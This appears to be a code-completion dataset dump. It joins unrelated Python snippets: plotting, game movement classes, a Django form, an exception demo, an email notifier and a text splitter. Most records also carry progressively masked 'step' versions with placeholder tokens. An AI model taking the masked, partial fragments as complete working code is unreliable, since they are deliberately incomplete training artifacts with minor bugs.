"step-5": "import matplotlib.pyplot as plt\n\nfile_list = [\"Quantification_comet_fdr.csv\",\n \"Quantification_crux_fdr.csv\",\n \"Quantification_msfg_fdr.csv\",\n \"Quantification_msfg_percolator.csv\"]\nfile_titles = [\"Comet\",\n \"Crux\",\n \"MSGFPlus\",\n \"MSGFPlus + Percolator\"]\n\nprotein_list = []\npeptides_list = []\n\nfor file_name in file_list:\n proteins = 0 # n of proteins\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3: # Proteins are listed after row 4\n proteins += 1\n peptides += int(line.split('\\t')[3]) # n_peptides is in column 4\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f\"{file_name} is done\")\n\nplt.bar(file_titles,\n protein_list,\n color=['black', 'red', 'green', 'blue', 'cyan'],\n edgecolor='blue')\nplt.title(\"Comparing proteins found\")\nplt.ylabel(\"Number of proteins matched\")\nplt.tight_layout() # Fixes cut off labels\nplt.savefig(\"search_engines_proteins.png\")\n\nplt.bar(file_titles,\n peptides_list,\n color=['black', 'red', 'green', 'blue', 'cyan'],\n edgecolor='blue')\nplt.title(\"Comparing amount of peptides matched\")\nplt.ylabel(\"Total amount of peptides matched\")\nplt.tight_layout() # Fixes cut off labels\nplt.savefig(\"search_engines_peptides.png\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
from abc import ABC, abstractmethod
class AbstractMoviment(ABC):
@abstractmethod
def move(self, dt) -> None:
pass
class Mov_LinearFall(AbstractMoviment):
def move(self, coordinates, speed, lastcoordinate, dt):
coordinates[1] = round(coordinates[1] + speed * dt)
return coordinates, speed
class Mov_ZigZag(AbstractMoviment):
direct = True
def move(self, coordinates, speed, startcoordinate, dt):
ZigZageamento = 100 # variacao max da nave
coordinates[1] = round(coordinates[1] + speed * dt)
if (startcoordinate[0] + ZigZageamento >= coordinates[0]) and (
self.direct): # se ele tava na esquerda vai pra direita
coordinates[0] = round(coordinates[0] + speed * dt)
elif (startcoordinate[0] - ZigZageamento <= coordinates[0]) and (not self.direct):
coordinates[0] = round(coordinates[0] - speed * dt)
else:
self.direct = not self.direct
return coordinates, speed
class Mov_DiagRight(AbstractMoviment):
def __init__(self, x_speed):
self.x_speed = x_speed # seno do angulo, .17 é bom
def move(self, coordinates, speed, startcoordinate, dt):
ZigZageamento = 100 # variacao max da nave
coordinates[1] = round(coordinates[1] + speed * dt)
# sin(10 degrees) = .17
coordinates[0] = round(coordinates[0] + speed*self.x_speed * dt)
return coordinates, speed
class Mov_DiagLeft(AbstractMoviment):
def __init__(self, x_speed):
self.x_speed = x_speed # seno do angulo, .17 é bom
def move(self, coordinates, speed, startcoordinate, dt):
ZigZageamento = 100 # variacao max da nave
coordinates[1] = round(coordinates[1] + speed * dt)
# sin(10 degrees) = .17
coordinates[0] = round(coordinates[0] - speed*self.x_speed * dt)
return coordinates, speed
|
normal
|
{
"blob_id": "57935b560108ef0db59de9eee59aa0c908c58b8f",
"index": 2348,
"step-1": "<mask token>\n\n\nclass Mov_ZigZag(AbstractMoviment):\n <mask token>\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-2": "<mask token>\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-3": "<mask token>\n\n\nclass Mov_LinearFall(AbstractMoviment):\n\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-4": "<mask token>\n\n\nclass AbstractMoviment(ABC):\n <mask token>\n\n\nclass Mov_LinearFall(AbstractMoviment):\n\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n if startcoordinate[0] + ZigZageamento >= coordinates[0\n ] and self.direct:\n coordinates[0] = round(coordinates[0] + speed * dt)\n elif startcoordinate[0] - ZigZageamento <= coordinates[0\n ] and not self.direct:\n coordinates[0] = round(coordinates[0] - speed * dt)\n else:\n self.direct = not self.direct\n return coordinates, speed\n\n\nclass Mov_DiagRight(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] + speed * self.x_speed * dt)\n return coordinates, speed\n\n\nclass Mov_DiagLeft(AbstractMoviment):\n\n def __init__(self, x_speed):\n self.x_speed = x_speed\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100\n coordinates[1] = round(coordinates[1] + speed * dt)\n coordinates[0] = round(coordinates[0] - speed * self.x_speed * dt)\n return coordinates, speed\n",
"step-5": "from __future__ import annotations\nfrom abc import ABC, abstractmethod\n\n\nclass AbstractMoviment(ABC):\n @abstractmethod\n def move(self, dt) -> None:\n pass\n\n\nclass Mov_LinearFall(AbstractMoviment):\n def move(self, coordinates, speed, lastcoordinate, dt):\n coordinates[1] = round(coordinates[1] + speed * dt)\n return coordinates, speed\n\n\nclass Mov_ZigZag(AbstractMoviment):\n direct = True\n\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n\n if (startcoordinate[0] + ZigZageamento >= coordinates[0]) and (\n self.direct): # se ele tava na esquerda vai pra direita\n coordinates[0] = round(coordinates[0] + speed * dt)\n\n elif (startcoordinate[0] - ZigZageamento <= coordinates[0]) and (not self.direct):\n coordinates[0] = round(coordinates[0] - speed * dt)\n\n else:\n self.direct = not self.direct\n\n return coordinates, speed\n\nclass Mov_DiagRight(AbstractMoviment):\n def __init__(self, x_speed):\n self.x_speed = x_speed # seno do angulo, .17 é bom\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n # sin(10 degrees) = .17\n coordinates[0] = round(coordinates[0] + speed*self.x_speed * dt)\n\n return coordinates, speed\n\nclass Mov_DiagLeft(AbstractMoviment):\n def __init__(self, x_speed):\n self.x_speed = x_speed # seno do angulo, .17 é bom\n def move(self, coordinates, speed, startcoordinate, dt):\n ZigZageamento = 100 # variacao max da nave\n coordinates[1] = round(coordinates[1] + speed * dt)\n # sin(10 degrees) = .17\n coordinates[0] = round(coordinates[0] - speed*self.x_speed * dt)\n\n return coordinates, speed",
"step-ids": [
8,
9,
11,
12,
15
]
}
|
[
8,
9,
11,
12,
15
] |
from django import forms
from django.forms import ModelForm
from .models import Noticia
class NoticiaForm(ModelForm):
class Meta:
model = Noticia
fields = ['idNoticia', 'resumen', 'titulo', 'categoria']
|
normal
|
{
"blob_id": "e7a283e0e0e16e9adb415b26d724b2ee84c4f4f8",
"index": 1547,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass NoticiaForm(ModelForm):\n\n\n class Meta:\n model = Noticia\n fields = ['idNoticia', 'resumen', 'titulo', 'categoria']\n",
"step-3": "from django import forms\nfrom django.forms import ModelForm\nfrom .models import Noticia\n\n\nclass NoticiaForm(ModelForm):\n\n\n class Meta:\n model = Noticia\n fields = ['idNoticia', 'resumen', 'titulo', 'categoria']\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
<|reserved_special_token_1|>
s = '123'
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print('ValueError occurs!!!', ve)
except ZeroDivisionError as e:
print('ValueError occurs!!!', e)
except:
print('Error occurs!!!')
else:
print('elseeeeeeeeeeeeeee')
finally:
print('ABCDEFG')
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # 예외 발생 가능 코드들
# except:
# # 예외시 처리될 구문
# except:
# pass #씹겠다?!
# else:
# #예외가 없을 경우 실행되는 부분
# finally:
# #예외가 있던 없던 실행되는 부분
|
flexible
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import smtplib
import subprocess
import time
class NotifyError(Exception):
def __init__(self, message):
self.message = message
class Notification(object):
def __init__(self, config, dry_run):
self.dry_run = dry_run
self.notifications = {}
def submit(self, recipient, message):
if recipient not in self.notifications:
self.notifications[recipient] = []
self.notifications[recipient].append(message)
def notify_all(self):
for recip in self.notifications:
if len(self.notifications[recip]) > 0:
self.notify(recip, '\r\n\r\n-------------------\r\n\r\n'.join(self.notifications[recip]))
time.sleep(5)
self.notifications[recip] = []
def notify(self, recipient, message):
raise NotImplementedError('Need to subclass Notification')
def connect(self):
raise NotImplementedError('Need to subclass Notification')
def close(self):
raise NotImplementedError('Need to subclass Notification')
class SendMail(Notification):
def __init__(self, config, dry_run):
super().__init__(config, dry_run)
self.address = config.sendmail.address
self.contact_info = config.sendmail.contact_info
self.message_template = '\r\n'.join(['From: '+self.address,
'To: {}',
'Subject: ['+config.name+'] Notifications',
'',
'Greetings Human {},',
'',
'{}'
'',
'',
'Beep boop,',
config.name + ' Bot'])
def notify(self, recipient, message):
# -i flag: do NOT treat bare dot as EOF
cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.contact_info[recipient]['address']]
msg = self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)
proc = subprocess.Popen(cmd, shell=False,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate(input=msg.encode('utf-8'))
#TODO handle errors
#print(f"ret: {proc.returncode}")
#print("stdout:" + str(out))
#print("stderr:" + str(err))
def connect(self):
pass
def close(self):
pass
class SMTP(Notification):
def __init__(self, config, dry_run):
super().__init__(config, dry_run)
self.hostname = config.smtp.hostname
self.username = config.smtp.username
self.passwd = config.smtp.passwd
self.address = config.smtp.address
self.contact_info = config.smtp.contact_info
self.connected = False
self.message_template = '\r\n'.join(['From: '+self.address,
'To: {}',
'Subject: ['+config.name+'] Notifications',
'',
'Greetings Human {},',
'',
'{}'
'',
'',
'Beep boop,',
config.name + ' Bot'])
#TODO deal with smtplib exceptions
def connect(self):
self.server = smtplib.SMTP(self.hostname)
self.server.ehlo()
self.server.starttls()
self.server.login(self.username, self.passwd)
self.connected = True
#TODO implement saving messages to disk with timestamp if send fails
#TODO deal with smtplib exceptions
def notify(self, recipient, message):
if not self.connected:
raise NotifyError('Not connected to SMTP server; cannot send notifications')
self.server.sendmail(self.address,
self.contact_info[recipient]['address'],
self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)
)
#TODO deal with smtplib exceptions
def close(self):
if self.connected:
self.server.quit()
self.connected = False
|
normal
|
{
"blob_id": "01849a6bf5ce5eb75c549af28312f61711ad2494",
"index": 4425,
"step-1": "<mask token>\n\n\nclass Notification(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-2": "<mask token>\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-3": "<mask token>\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n <mask token>\n <mask token>\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n\n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-4": "import smtplib\nimport subprocess\nimport time\n\n\nclass NotifyError(Exception):\n\n def __init__(self, message):\n self.message = message\n\n\nclass Notification(object):\n\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n\n def submit(self, recipient, message):\n if recipient not in self.notifications:\n self.notifications[recipient] = []\n self.notifications[recipient].append(message)\n\n def notify_all(self):\n for recip in self.notifications:\n if len(self.notifications[recip]) > 0:\n self.notify(recip, '\\r\\n\\r\\n-------------------\\r\\n\\r\\n'.\n join(self.notifications[recip]))\n time.sleep(5)\n self.notifications[recip] = []\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n\n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def notify(self, recipient, message):\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.\n contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient][\n 'address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\n\nclass SMTP(Notification):\n\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: ' + self.address,\n 'To: {}', 'Subject: [' + config.name + '] Notifications', '',\n 'Greetings Human {},', '', '{}', '', 'Beep boop,', config.name +\n ' Bot'])\n\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError(\n 'Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, self.contact_info[recipient][\n 'address'], self.message_template.format(self.contact_info[\n recipient]['address'], self.contact_info[recipient]['name'],\n message))\n\n def close(self):\n if self.connected:\n self.server.quit()\n self.connected = False\n",
"step-5": "import smtplib\nimport subprocess\nimport time\n\nclass NotifyError(Exception):\n def __init__(self, message):\n self.message = message\n\nclass Notification(object):\n def __init__(self, config, dry_run):\n self.dry_run = dry_run\n self.notifications = {}\n\n def submit(self, recipient, message):\n if recipient not in self.notifications:\n self.notifications[recipient] = []\n self.notifications[recipient].append(message)\n\n def notify_all(self):\n for recip in self.notifications:\n if len(self.notifications[recip]) > 0:\n self.notify(recip, '\\r\\n\\r\\n-------------------\\r\\n\\r\\n'.join(self.notifications[recip]))\n time.sleep(5)\n self.notifications[recip] = []\n\n def notify(self, recipient, message):\n raise NotImplementedError('Need to subclass Notification')\n\n def connect(self):\n raise NotImplementedError('Need to subclass Notification')\n \n def close(self):\n raise NotImplementedError('Need to subclass Notification')\n\n\nclass SendMail(Notification):\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.address = config.sendmail.address\n self.contact_info = config.sendmail.contact_info\n self.message_template = '\\r\\n'.join(['From: '+self.address,\n 'To: {}',\n 'Subject: ['+config.name+'] Notifications',\n '',\n 'Greetings Human {},',\n '',\n '{}'\n '',\n '',\n 'Beep boop,',\n config.name + ' Bot'])\n\n def notify(self, recipient, message):\n # -i flag: do NOT treat bare dot as EOF\n cmd = ['/usr/sbin/sendmail', f'-f {self.address}', self.contact_info[recipient]['address']]\n msg = self.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)\n proc = subprocess.Popen(cmd, shell=False,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = proc.communicate(input=msg.encode('utf-8'))\n #TODO handle errors\n #print(f\"ret: {proc.returncode}\")\n #print(\"stdout:\" + str(out))\n #print(\"stderr:\" + str(err))\n\n def connect(self):\n pass\n\n def close(self):\n pass\n\nclass SMTP(Notification):\n def __init__(self, config, dry_run):\n super().__init__(config, dry_run)\n self.hostname = config.smtp.hostname\n self.username = config.smtp.username\n self.passwd = config.smtp.passwd\n self.address = config.smtp.address\n self.contact_info = config.smtp.contact_info\n self.connected = False\n self.message_template = '\\r\\n'.join(['From: '+self.address,\n 'To: {}',\n 'Subject: ['+config.name+'] Notifications',\n '',\n 'Greetings Human {},',\n '',\n '{}'\n '',\n '',\n 'Beep boop,',\n config.name + ' Bot'])\n\n #TODO deal with smtplib exceptions\n def connect(self):\n self.server = smtplib.SMTP(self.hostname)\n self.server.ehlo()\n self.server.starttls()\n self.server.login(self.username, self.passwd)\n self.connected = True\n\n #TODO implement saving messages to disk with timestamp if send fails\n #TODO deal with smtplib exceptions\n def notify(self, recipient, message):\n if not self.connected:\n raise NotifyError('Not connected to SMTP server; cannot send notifications')\n self.server.sendmail(self.address, \n\t\t\t\tself.contact_info[recipient]['address'], \n\t\t\t\tself.message_template.format(self.contact_info[recipient]['address'], self.contact_info[recipient]['name'], message)\n )\n\n #TODO deal with smtplib exceptions\n def close(self):\n if self.connected: \n self.server.quit()\n self.connected = False\n\n\n\n",
"step-ids": [
11,
12,
15,
20,
21
]
}
|
[
11,
12,
15,
20,
21
] |
import logging
from typing import List, Optional
import uuid
from pydantic import BaseModel
from obsei.payload import TextPayload
from obsei.preprocessor.base_preprocessor import (
BaseTextPreprocessor,
BaseTextProcessorConfig,
)
logger = logging.getLogger(__name__)
class TextSplitterPayload(BaseModel):
phrase: str
chunk_id: int
chunk_length: int
start_index: int
end_index: int
document_id: str
text_length: int
total_chunks: Optional[int]
class TextSplitterConfig(BaseTextProcessorConfig):
max_split_length: int = 512
split_stride: int = 0 # overlap length
document_id_key: Optional[str] # document_id in meta
class TextSplitter(BaseTextPreprocessor):
def preprocess_input( # type: ignore[override]
self, input_list: List[TextPayload], config: TextSplitterConfig, **kwargs
) -> List[TextPayload]:
text_splits: List[TextPayload] = []
for idx, input_data in enumerate(input_list):
if (
config.document_id_key
and input_data.meta
and config.document_id_key in input_data.meta
):
document_id = str(input_data.meta.get(config.document_id_key))
else:
document_id = uuid.uuid4().hex
start_idx = 0
split_id = 0
document_splits: List[TextSplitterPayload] = []
document_length = len(input_data.processed_text)
while start_idx < document_length:
if config.split_stride > 0 and start_idx > 0:
start_idx = (
self._valid_index(
input_data.processed_text, start_idx - config.split_stride
)
+ 1
)
end_idx = self._valid_index(
input_data.processed_text,
min(start_idx + config.max_split_length, document_length),
)
phrase = input_data.processed_text[start_idx:end_idx]
document_splits.append(
TextSplitterPayload(
phrase=phrase,
chunk_id=split_id,
chunk_length=len(phrase),
start_index=start_idx,
end_index=end_idx,
document_id=document_id,
text_length=document_length,
)
)
start_idx = end_idx + 1
split_id += 1
total_splits = len(document_splits)
for split in document_splits:
split.total_chunks = total_splits
payload = TextPayload(
processed_text=split.phrase,
source_name=input_data.source_name,
